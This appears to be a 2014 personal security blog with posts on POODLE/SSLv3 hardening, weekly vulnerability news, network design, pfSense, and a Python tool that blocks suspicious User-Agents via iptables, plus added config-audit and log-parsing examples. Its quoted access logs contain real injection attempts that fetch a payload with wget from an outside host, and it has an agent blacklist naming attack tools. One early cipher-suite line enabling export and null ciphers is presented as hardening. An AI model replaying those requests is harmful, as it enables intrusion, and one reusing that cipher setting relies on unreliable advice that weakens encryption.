
Tuesday, 14 October 2014

SSL issue again? [UPDATE 2]

Today The Register announced that there will be a new threat against SSL soon.
According to the source there are currently only rumours, and the only information available is that it will be a threat to SSL v3.

So maybe it's just time to get prepared for whatever comes our way.

What I have done on my server:
    1. I checked the details of my current SSL usage via https://www.ssllabs.com/ssltest/analyze.html?d=<SERVERNAME>
    2. As the check deducted some points, I created a new certificate using a 2048-bit key and SHA-256
    3. I adjusted some settings in my Apache config

  • SSLProtocol +TLSv1 +TLSv1.1 +TLSv1.2
  • SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+EXP:+eNULL

    So I have disabled SSL for now and force TLS only. This uses the same library and only some "handshake" information changes, but maybe it buys some extra time.

    So let's find out what the night brings.

    [UPDATE 2014/10/15]
    The issue has been announced.

    http://www.thedomains.com/2014/10/14/google-discloses-a-vulnerability-in-ssl-3-0/

    http://www.theregister.co.uk/2014/10/14/google_drops_ssl_30_poodle_vulnerability/

    I haven't seen a proof of concept yet, but as it seems it is just a fallback issue: an attacker can force the SSL/TLS version down to a vulnerable (or less secure) version, for example SSLv3, which now has an issue that lets an attacker calculate the plaintext of the secure connection.

    So the ideas from yesterday (see above) are still right.


    [UPDATE 2014/10/16]
    Just for the record:

    A great overview of all the changes you can make to protect yourself:

    https://scotthelme.co.uk/sslv3-goes-to-the-dogs-poodle-kills-off-protocol/

    And as an update to my ideas above, you should perhaps set your cipher suite to:

    SSLCipherSuite EECDH+AES:EDH+AES:-SHA1:EECDH+RC4:EDH+RC4:RC4-SHA:EECDH+AES256:DHE+AES256:AES256-SHA:!aNULL:!eNULL:!EXP:!LOW:!MD5

    Then it will support "Forward Secrecy", at least for some browsers.
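Because mod_ssl treats `+name`, `-name` and a bare name differently, it is easy to believe SSLv3 is off when it is not. The following checker is an added example (not from this post or from Apache) that evaluates SSLProtocol lines with those rules and reports any that still enable SSLv3; the config fragment is constructed and mirrors the directive used above.

```python
# Protocol names mod_ssl accepted in 2014; its "all" shortcut never includes SSLv2.
KNOWN = {"sslv2": "SSLv2", "sslv3": "SSLv3", "tlsv1": "TLSv1",
         "tlsv1.1": "TLSv1.1", "tlsv1.2": "TLSv1.2"}
ALL = {"SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2"}


def enabled_protocols(directive):
    """Evaluate one SSLProtocol line the way mod_ssl parses it:
    '+name' adds, '-name' removes, and a bare name replaces everything seen so far."""
    words = directive.split()
    if not words or words[0].lower() != "sslprotocol":
        raise ValueError("not an SSLProtocol directive: %r" % directive)
    enabled = set()
    for word in words[1:]:
        action = word[0] if word[0] in "+-" else ""
        name = word[len(action):].lower()
        if name == "all":
            protos = set(ALL)
        elif name in KNOWN:
            protos = {KNOWN[name]}
        else:
            raise ValueError("unknown protocol: %r" % word)
        if action == "-":
            enabled -= protos
        elif action == "+":
            enabled |= protos
        else:
            enabled = protos  # bare token: everything before it is discarded
    return enabled


def audit_config(text):
    """Return (line_no, directive, problem) for each SSLProtocol line that still
    enables SSLv3 (the POODLE target) or that leaves no protocol enabled at all."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        words = line.split()
        if not words or words[0].lower() != "sslprotocol":
            continue
        enabled = enabled_protocols(line)
        if not enabled:
            findings.append((no, line, "no protocol enabled at all"))
        elif "SSLv3" in enabled:
            findings.append((no, line, "SSLv3 still enabled"))
    return findings


# Constructed fragment, one candidate directive per line as you might collect them from
# several vhost files: the post's line, the usual "all -SSLv3" form, a vulnerable
# default, and a missing '+' that silently re-enables SSLv3.
SAMPLE_CONF = """\
SSLEngine on
SSLProtocol +TLSv1 +TLSv1.1 +TLSv1.2
SSLProtocol all -SSLv3
SSLProtocol all
SSLProtocol -SSLv3 all
"""

if __name__ == "__main__":
    for no, line, problem in audit_config(SAMPLE_CONF):
        print(f"line {no}: {problem}: {line}")
```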

    Monday, 13 October 2014

    This week in security Week 40/41

    Some issues/news this week:


    CVE-2014-2044 Incomplete blacklist vulnerability in ajax/upload.php in ownCloud before 5.0, when running on Windows, allows remote authenticated users to bypass intended access restrictions, upload files with arbitrary names, and execute arbitrary code via an Alternate Data Stream (ADS) syntax in the filename parameter, as demonstrated using .htaccess::$DATA to upload a PHP program.

    How to Bypass Two-Factor Authentication (2FA) and What the Future Holds: If Two-Factor Authentication (2FA) Is Not Bulletproof, How Will We Authenticate? In the past couple of years, we have repeatedly been reminded of the weakness of passwords as an authentication method. High-profile breaches with millions of lost credentials, sophisticated desktop malware, advanced mobile malware, phishing scams and other attacks have proven time and time again that a username and password combination cannot provide the adequate evidence required for authentication.

    CVE-2014-1572 A critical zero-day vulnerability discovered in Mozilla's popular Bugzilla bug-tracking software, used by hundreds of prominent software organizations, both private and open-source, could expose sensitive information and vulnerabilities of the software projects to attackers.


    Sunday, 5 October 2014

    Analyzing Apache Logs [Introducing myPyApacheFW]

    There will be no news this weekend.
    Last week I did a lot of research regarding Apache, and in particular the User-Agent information.

    I run my own installation of ownCloud on one of my virtual servers. When you take a look at the access log, you may find something like:

    oc.johest.de:80 1.169.92.235 - - [05/Oct/2014:11:13:49 +0200] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 302 495 "-" "-"
    oc.johest.de:80 107.15.13.138 - - [05/Oct/2014:14:46:37 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
    oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
    oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
    oc.johest.de:443 54.187.189.195 - - [08/Jul/2014:19:08:57 +0200] "GET /admin/config.php HTTP/1.0" 403 9273 "-" "Python-urllib/1.17"
    oc.johest.de:443 114.112.100.51 - - [13/Jul/2014:00:09:39 +0200] "GET /admin/config.php HTTP/1.0" 403 9225 "-" "Python-urllib/1.17"
    oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:07:09:53 +0200] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 630 "-" "chroot-apach0day"
    oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:20:32:12 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 636 "-" "chroot-apach0day"
    oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:23:45:21 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 642 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"


    As you can easily see, such access is not really what you want. There is no need that a mail server connects to my web space, and I really don't think that I provide a tmUnblock.cgi. Even any connection via Python or curl and Wget seems a bit strange.
    On a different machine I saw some huge brute-force attacks using Wget.

    So what can you do?
    First I took a look at all the agent information I found in my own log files.
    It was obvious that some agents should not be there, so I made a list of them:

    • wget
    • curl
    • python
    • sqlmap
    • -
    • apache0day
    The last one stands for a missing header, i.e. someone accessed your page without showing any agent information.
    Then I created my own little tool.

    MyPyApacheFW

    First of all, when it comes to Apache hardening, there are several things you should do, and most of them will secure your web service more than my script currently can. So please, if you want to be sure, just use
    1. mod_security
    2. mod_evasive
    3. fail2ban
    4. apparmor
    and anyway, give my script a try :-)

    My script is available on GitHub:


    It simply takes an Apache access log file as input, parses it for any regex match of bad agents and blocks them via iptables.
    The newest version also supports GeoIP for logging.

    So once you have cloned it to your local device, you can simply run
    cat /var/log/apache/access.log | python mypyfw.py
    and it will work. I will always try to keep it backward compatible with the earliest version. So new features will not run by default and will use extra options, like:
    cat /var/log/apache/access.log | python mypyfw.py -g -t
    which performs a logging-only run, adding GeoIP information to the log file.

    I added my first add-on today, which is really just a few-liner to clean up iptables.
    You can find it within the Addon folder.
    mypy-ipfw-cleanup.py
    will just go through every rule and delete it if the rule did not receive any packets. As a bonus, it will reset the counter of every rule to zero. So if you run it every day, only active rules will stay on your system.
    Usage: mypyfw.py [options]
    
    Options:
      -h, --help            show this help message and exit
      -f FILE, --file=FILE  write report to FILE, default is /var/log/mypyfw.log
      -i IPPOSITION, --ippos=IPPOSITION
                            adjust IP position, default is 0
      -b FILE, --blacklist=FILE
                            path to blacklist, default values are Hardcoded
      -w FILE, --whitelist=FILE
                            path to Whitelist, default values are Hardcoded
      -t, --try-run          you want a test run
      -g, --geoIP           add GeoIP data to output
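To show what such a blacklist run looks like end to end, here is an added example (not the myPyApacheFW code from the post or its repository): it parses the vhost-prefixed log format quoted above, matches the post's agent list, honours a whitelist and produces the iptables rules a try-run would print. The whitelist networks and the last two log lines are constructed; "apach0day" is spelled as it appears in the log, since "apache0day" would never match those lines.

```python
import ipaddress
import re

# Access-log lines quoted in the post, followed by two constructed lines: one from a
# whitelisted monitoring host using Wget and one ordinary browser visit (TEST-NET address).
SAMPLE_LOG = """\
oc.johest.de:80 1.169.92.235 - - [05/Oct/2014:11:13:49 +0200] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 302 495 "-" "-"
oc.johest.de:80 107.15.13.138 - - [05/Oct/2014:14:46:37 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:23:45:21 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 642 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
oc.johest.de:443 10.0.0.5 - - [05/Oct/2014:12:00:00 +0200] "GET /status.php HTTP/1.1" 200 85 "-" "Wget/1.15 (linux-gnu)"
oc.johest.de:443 203.0.113.7 - - [05/Oct/2014:12:01:00 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0"
"""

# Combined log format with the optional "vhost:port" prefix seen above (the reason the
# original tool has an --ippos option); the client IP is the first dotted quad.
LOG_RE = re.compile(
    r'^(?:\S+:\d+\s+)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\S+\s+\S+\s+'
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<request>[^"]*)"\s+(?P<status>\d{3})\s+(?P<bytes>\d+|-)\s+'
    r'"(?P<referer>[^"]*)"\s+"(?P<agent>[^"]*)"\s*$')

# The post's blacklist as regexes. "-" is anchored, otherwise every agent containing a
# hyphen would match; "apach0day" is spelled as in the log, "apache0day" never matches it.
BAD_AGENTS = [re.compile(p, re.IGNORECASE)
              for p in (r"wget", r"curl", r"python", r"sqlmap", r"^-$", r"apach0day")]
WHITELIST = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "10.0.0.0/8")]  # constructed


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def offending_ips(log_text):
    """Map each non-whitelisted client IP to the blacklisted agents it used."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or any(ipaddress.ip_address(rec["ip"]) in net for net in WHITELIST):
            continue
        if any(p.search(rec["agent"]) for p in BAD_AGENTS):
            hits.setdefault(rec["ip"], []).append(rec["agent"])
    return hits


def block_commands(hits):
    """Try-run output: the iptables rules the tool would apply, one DROP per source IP."""
    return [f"iptables -A INPUT -s {ip} -j DROP" for ip in hits]


if __name__ == "__main__":
    for cmd in block_commands(offending_ips(SAMPLE_LOG)):
        print(cmd)
```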

    Wednesday, 1 October 2014

    [Guide] Network layout

    The week started as a silent one.

    A little guidance

    When it comes to network design, there are different preferred architectures. I would always recommend a two-layer setup. In this case two network components span a DMZ for services.

    Now you are able to split the traffic. Normally you place any external service machines within the external network, and any backend machines within the internal network.

    Backend traffic now needs to go through the second network component. Normally this machine would do basic (static) routing between the networks and would have some basic firewall rules.

    In another step we might add some firewalls to this layout, like DDoS prevention systems next to our external router and an application firewall in the external network.

    The DDoS protection should just protect our firewalls. So, if we compare DDoS protection to a firewall (like a pfSense hardware firewall), the firewall would be able to handle 8.000.000 packets, as it is stateful. Stateful means that every packet which goes through it is saved in an internal table. A DDoS attack can easily exceed this packet count, so it would kill our firewall first. So dropping all DDoS traffic in a first step always leads to a more solid system.
    Please keep in mind that the routing components which separate the networks already do basic firewalling. They should always deny traffic from outside to the internal network and should really take care of the traffic; for example, no external service machine should be able to interact with every internal machine, the external machine should only communicate with its dedicated internal machines.

    The application firewall is just for service protection.
    We are able to filter XSS attacks on HTTP/HTTPS or do malware checking within the email traffic.


    Sunday, 28 September 2014

    This week in security Week 39

    This is my review of the biggest security news of last week. Caused by a lot of trouble within bash, there are only two topics this week.

    Mozilla will phase out SHA-1 certificates. As reported in a blog post, caused by an increasing amount of attacks against this 20-year-old standard, Mozilla will drop support for SHA-1 certificates. CAs and server operators should renew their certificates, switching to a newer standard. The timeline shows that they will accept these certificates until 2017/01/01.

    A bash vulnerability was found. It was reported as CVE-2014-6271. Described in a very simple way, bash is currently vulnerable to code injection. As many services are using bash, for example the DHCP client, malicious servers might be able to inject code on the client machine and execute it.
    When recalling the news this week, it seems that nothing was as important as this flaw in bash. So let's get into a bit more detail. Many proofs of concept have been published this week; what they all have in common is that you need to have a service using bash, and this service has to be reachable from the external network.

    As taken from the bug description, here is the (first) list of possible attack paths:
    • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawning GNU Bash subshells, or on any system where the /bin/sh interface is implemented using GNU Bash.
    • Override or bypass of the ForceCommand feature in OpenSSH sshd and of the limited protection for some Git and Subversion deployments used to restrict shells, allowing arbitrary command execution. This data path is vulnerable on systems where the /bin/sh interface is implemented using GNU Bash.
    • Allow arbitrary commands to run on a DHCP client machine.

    So, what's bad in this case: if you use bash as a CGI language in your web service, you should fix this bug. If you use servers within a data center and your provider assigns your IP address via DHCP, you should fix your systems and talk to your provider.
    All in all it isn't easy to inject calls into your bash from an external network, or at least it should not be easy. In all cases, updates are provided, so fix your system. If unsure, maybe you are running an outdated version which will not receive any updates; shut down the service which you think might be affected and test it.
    The IBM intrusion detection solution has been using a mechanism to prevent shell injection for 7 years.


    Tuesday, 23 September 2014

    [Tool] pfsense, the all-in-one firewall

    Whatever we learned from the big companies in network infrastructure, there is one thing Juniper and Cisco have in common: both bank on FreeBSD.

    So there is another firewall system which does so: pfSense.

    The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. The pfSense project has become a fairly popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a single computer to large corporations, universities and other organizations protecting thousands of network devices.
    This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. We also offer an embedded image for Compact Flash based installations. The two projects have since diverged significantly.
    We've steadily grown to become one of the most widely used network firewalls in the world, with in excess of 200,000 known live installs as of December 2013.

    In the usual case you just download a live installer from their website. Both i386 and amd64 architectures are supported. The basic installation is quite easy to handle.
    After the reboot you need to choose

    • WAN interface: The Wide Area Network interface, your external connection
    • LAN Interface: The Local Area Network interface, your internal connection
    In today's designs, the firewall is placed between the external and internal networks, so any packet from outside needs to go through the firewall first.

    pfSense has a huge package database: many features are already included, and others are easy to install and will be integrated into the web configuration toolbox. The following list should give an overview of some of these components.
    • Suricata, High Performance Network IDS, IPS and Security Monitoring engine by OISF.
    • HAProxy, The Reliable, High Performance TCP/HTTP Load Balancer
    • MailScanner, an e-mail security and anti-spam package for e-mail gateway systems.
    • a proxy including ModSecurity. ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis. In addition this package allows URL forwarding, which can be convenient for hosting multiple websites behind pfSense using one IP address.
    • squid including squidGuard, a high performance web proxy cache. It combines squid as a proxy server with its capabilities of acting as an HTTP/HTTPS reverse proxy. It includes an Exchange Web Access (OWA) assistant.
    and many, many more.

    pfSense is fully manageable via a web interface. When both LAN and WAN are set, be careful: WAN access is blocked by default, so you will not be able to access the GUI or SSH from outside. So maybe you want to adjust your internal IPs first.



    Sunday, 21 September 2014

    This week in security Week 38

    Regarding security-related news it was an endless week (again); the following are just some of the topics this week.

    My recent news of the week:

    FreeBSD has finally closed a bug which was found within the TCP stack. The original bug was found back in 2004, CVE-2004-0230. The bug basically could lead to a denial-of-service attack by injecting TCP RST packets into the stream. RST packets are normally sent in response to a segment that belongs to no TCP connection, for example when the port rejects the connection. The issue is related to large window sizes and long-lived active connections, such as BGP. FreeBSD is the OS used underneath Cisco, Juniper and MacOS (for example).

    APT, the package management system within Debian and Ubuntu, closed a bug regarding package verification. So basically, the reinstallation of a package did not verify the package again. So if an attacker were able to tamper with the package within the cache/tmp directory, this package could just be installed.

    As reported by some teams, during the last week there was a huge increase in chargen-related attacks. Chargen is a Linux tool which listens on port 19 for TCP and UDP packets. Chargen replies to a request by sending between 0 and 512 random characters to a specified port. A manipulated UDP packet could force chargen to send the data as UDP packets to any service on any server and could be part of a DDoS attack. So I would recommend blocking all inbound UDP traffic coming from port 19 on a central firewall.

    SpiderLabs, the creators of the OWASP ModSecurity rules, reported a new attack on their honeypots. In this case, the well-known PHP CGI vulnerability is used to upload and install malware.

    There was a really good post on the Red Hat security blog about the TLS landscape nowadays. In my opinion the key outcome of the post is that we really need to increase SSL/TLS usage today. Currently only 40% of all web servers support TLS by default. Maybe the Google idea of ranking sites with TLS higher than others will help in this case too.

    In the USA the do-it-yourself centers of Home Depot had an issue, and 56.000.000 credit card records were lost. According to new information, many employees informed the management years ago that this information wasn't secured the way it should be.